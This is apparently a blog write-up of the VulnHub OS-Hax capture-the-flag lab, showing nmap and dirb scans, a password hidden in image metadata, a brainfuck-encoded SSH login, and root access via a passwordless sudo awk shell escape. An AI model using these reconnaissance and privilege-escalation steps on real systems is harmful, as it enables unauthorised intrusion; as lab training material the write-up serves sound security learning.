[VULNHUB] OS-Hax

4 min readDec 30, 2019

For Indonesian version of this write-up, click here.

Setup

Add machine’s IP address with localhost hostname in /etc/hosts , don't forget to comment out other loopback addresses with the localhost hostname.

#127.0.0.1      localhost
127.0.1.1       kali

# The following lines are desirable for IPv6 capable hosts
#::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

<Machine_IP> localhost

Information Gathering

nmap

The first thing to do is gathering some information using nmap .

nmap -sV -sC -p- localhost -oN initial.nmap -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 43:0e:61:74:5a:cc:e1:6b:72:39:b2:93:4e:e3:d0:81 (RSA)
|   256 43:97:64:12:1d:eb:f1:e9:8c:d1:41:6d:ed:a4:5e:9c (ECDSA)
|_  256 e6:3a:13:8a:77:84:be:08:57:d2:36:8a:18:c9:09:d6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 5ECF6AFD7D00CCBE6B3C7AA8FD31BDE8
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
MAC Address: 08:00:27:E2:E3:E2 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There listed the server only runs HTTP service.

dirb

Since we know that the server is running HTTP service, we can use dirb or gobuster to scan the server’s directory.

dirb http://localhost /usr/share/wordlists/dirb/common.txt

---- Scanning URL: http://localhost/ ----
==> DIRECTORY: http://localhost/css/
==> DIRECTORY: http://localhost/html/
==> DIRECTORY: http://localhost/img/
+ http://localhost/index.html (CODE:200|SIZE:3135)
==> DIRECTORY: http://localhost/js/
+ http://localhost/server-status (CODE:403|SIZE:274)
==> DIRECTORY: http://localhost/wordpress/

From the scan result, we know that the server also running Wordpress as the CMS. Then we can use wpscan to scan the vulnerability that may exist on the server.

wpscan

wpcan --url http://localhost/wordpress/

But there is no interesting stuff from the scan result. The server runs the newest version of Wordpress, builtin theme, and no plugin at all.

Next, I tried to open other directories listed by dirb . Which is /css , /html , and /img .

And I found interesting stuff in /img , which is the flaghost.png .

ExifTool

ExifTool is a free and open-source software program for reading, writing, and manipulating image, audio, video, and PDF metadata.

We can use exiftool to examine the metadata fromflaghost.png .

Metadata is “data that provides information about other data”. In other words, it is “data about data. wikipedia.org

Pixels Per Unit X               : 3780
Pixels Per Unit Y               : 3780
Pixel Units                     : meters
Make                            : passw@45
Image Size                      : 387x98
Megapixels                      : 0.038

It turns out that there is passw@45 string in the metadata.

Then open http://localhost/passw@45 and we got another clue, the flag2.txt .

The flag2.txt contains a brainfuck file inside.

+++++ +++++ [->++ +++++ +++<] >++++ +++++ +++++ +++++ .<+++ +[->- ---<]
>--.- --.<+ +++++ [->-- ----< ]>--- -.<++ +[->+ ++<]> +++++ .<+++ ++[->
+++++ <]>.+ +.+++ +++++ .---- --.<+ ++[-> +++<] >++++ .<+++ ++++[ ->---
----< ]>-.< +++[- >---< ]>--- .+.-- --.++ +.<

Brainfuck is an esoteric programming language created in 1993 by Urban Müller, and is notable for its extreme minimalism. The language consists of only eight simple commands and an instruction pointer.

Next, we can use brainfuck interpreter such as copy.sh to interpret the program’s output.

web:Hacker@4514

Exploitation

User Flag

ssh with the credential we get before, and we get the user flag.

web@jax:~$ id
uid=1001(web) gid=1000(uname-a) groups=1000(uname-a)
web@jax:~$ ls
flag3.txt
web@jax:~$ cat flag3.txt 
   ______          ______          ____                 __ 
  / ____/____     /_  __/____     / __ \ ____   ____   / /_
 / / __ / __ \     / /  / __ \   / /_/ // __ \ / __ \ / __/
/ /_/ // /_/ /    / /  / /_/ /  / _, _// /_/ // /_/ // /_  
\____/ \____/    /_/   \____/  /_/ |_| \____/ \____/ \__/  
                                                           

MD5-HASH : 40740735d446c27cd551f890030f7c75

Then run system enumeration using linenum in /tmp directory.

[+] We can sudo without supplying a password!
Matching Defaults entries for web on jax:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User web may run the following commands on jax:
    (root) NOPASSWD: /usr/bin/awk


[+] Possible sudo pwnage!
/usr/bin/awk

From the enumeration result above we know that the user web can run awk command as sudo without providing password.

That point can be confirmed by opening /etc/sudoers to see the user privilege specification for web user.

web     ALL= (root) NOPASSWD: /usr/bin/awk

Then we can use gtfo.bins to look for command that can be abused to gain privilege escalation usingawk.

sudo awk 'BEGIN {system("/bin/sh")}' and we gain root access.